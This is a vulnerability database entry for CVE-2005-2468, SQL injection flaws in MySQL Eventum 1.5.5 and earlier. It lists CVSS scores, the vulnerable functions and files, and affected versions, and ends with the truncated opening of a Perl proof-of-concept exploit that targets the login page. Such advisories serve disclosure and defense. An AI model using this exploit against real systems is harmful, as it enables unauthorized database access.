6.4
CVSSv2

CVE-2005-2468

Published: 31/12/2005 Updated: 18/10/2016
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Multiple SQL injection vulnerabilities in MySQL Eventum 1.5.5 and previous versions allow remote malicious users to execute arbitrary SQL commands via the (1) isCorrectPassword or (2) userExist function in class.auth.php, getCustomFieldReport function in (4) custom_fields.php, (5) custom_fields_graph.php, or (6) class.report.php, or the insert function in (7) releases.php or (8) class.release.php.

Vulnerable Product Search on Vulmon Subscribe to Product

mysql eventum 1.4

mysql eventum 1.2.2

mysql eventum 1.1

mysql eventum 1.3.1

mysql eventum 1.5.5

mysql eventum 1.3

mysql eventum 1.2

mysql eventum 1.5.4

Exploits

#!/usr/bin/perl -w use IO::Socket; use strict; print "#################################\n"; print "# MySQL Eventum <= v155 SQL Injection PoC #\n"; print "# James Bercegay // gulftechorg // 7-28-05 #\n"; print "#################################\n"; my $host = 'localhost'; my $path = '/eventum/loginphp'; my $user = '2'; my $port = 8 ...